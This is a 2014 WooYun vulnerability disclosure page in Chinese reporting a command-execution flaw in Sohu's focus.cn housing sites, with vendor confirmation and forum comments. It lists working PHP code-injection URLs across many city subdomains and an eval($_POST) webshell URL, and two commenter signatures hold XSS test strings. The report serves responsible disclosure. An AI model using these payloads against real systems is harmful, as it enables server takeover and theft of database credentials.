当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063363

漏洞标题:搜狐(第二季)旗下某站通用型命令执行第五集(批量shell,自带后门)

相关厂商:搜狐

漏洞作者: 浩天

提交时间:2014-06-03 16:10

修复时间:2014-07-18 16:11

公开时间:2014-07-18 16:11

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-03: 细节已通知厂商并且等待厂商处理中
2014-06-03: 厂商已经确认,细节仅向厂商公开
2014-06-13: 细节向核心白帽子及相关领域专家公开
2014-06-23: 细节向普通白帽子公开
2014-07-03: 细节向实习白帽子公开
2014-07-18: 细节向公众公开

简要描述:

之前的案例获取到了大量的mysql信息,一直缺shell,我的漏洞也都到日期公布了,很多白帽子蜂拥而至,抢生意了,都戒撸了,看来我是剁手党吖

详细说明:

不同的服务器名:批量shell的感觉不一样吖

1.png


http://sz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://gz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://cd.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://bj.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://sh.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://hz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://tj.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://cq.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://sjz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://nj.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://sy.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
http://puyang.esf.focus.cn/ajax/get_house_map_mark.json.php?config={phpinfo()}&type=sale
......还有很多,跟之前的sql注一样,替换地区域名即可实现批量shell

漏洞证明:

没传shell,自带后门,呵呵
http://sz.esf.focus.cn/ajax/get_house_map_mark.json.php?config={eval($_POST[c])}&type=sale

2.png


数据库配置信息泄露一地吖,不读了,有shell,其实很开心
,漫不漫游的就这么回事吧

修复方案:

原始开发人员自留的后门??

版权声明:转载请注明来源 浩天@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-03 16:42

厂商回复:

感谢对搜狐安全关注

最新状态:

暂无


漏洞评价:

评论

  1. 2014-06-03 16:11 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    你在乌云这么装逼,其他人知道吗^_^

  2. 2014-06-03 16:13 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    妈呀,又要怀孕了

  3. 2014-06-04 09:21 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    牛逼

  4. 2014-06-04 10:03 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @川神 驾临

  5. 2014-06-19 11:27 | 麻花藤 ( 路人 | Rank:15 漏洞数:1 | ด้้้้้็็็็็้้้้้็็็็...)

    专注搜狐啊,不能一直逮着一个可劲薅啊

  6. 2014-07-18 16:39 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    浩天叔就是牛

  7. 2014-07-18 16:48 | xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)

    搜狐专场吗

  8. 2014-07-20 15:00 | 酷帥王子 ( 普通白帽子 | Rank:111 漏洞数:34 | 天朗日清,和风送闲,可叹那俊逸如我顾影自...)

    @浩天 大牛叉们能不能把每次的开演搞个开场白,戏剧背景什么的,一上来就开演,有些生硬,小白们看了,不大明白,毕竟小白们也很期待登上舞台,比方你这个代码执行是怎么发现的,有什么通用性,怎么就存在这样的漏洞,或者这样的漏洞存在有什么标志性的东西,好让小白们也装一屄啊

  9. 2014-07-20 15:01 | 酷帥王子 ( 普通白帽子 | Rank:111 漏洞数:34 | 天朗日清,和风送闲,可叹那俊逸如我顾影自...)

    哈哈

  10. 2014-07-21 23:01 | 可福 ( 路人 | Rank:2 漏洞数:1 | ...)

  11. 2014-07-22 09:44 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    你这怎么找到的!!!你和开发人员有一腿??

  12. 2014-07-22 15:52 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    给力

  13. 2014-07-22 15:59 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @wefgod 最近没见你来提交漏洞吖,快快给力吖

  14. 2014-07-29 11:43 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @浩天 木有空……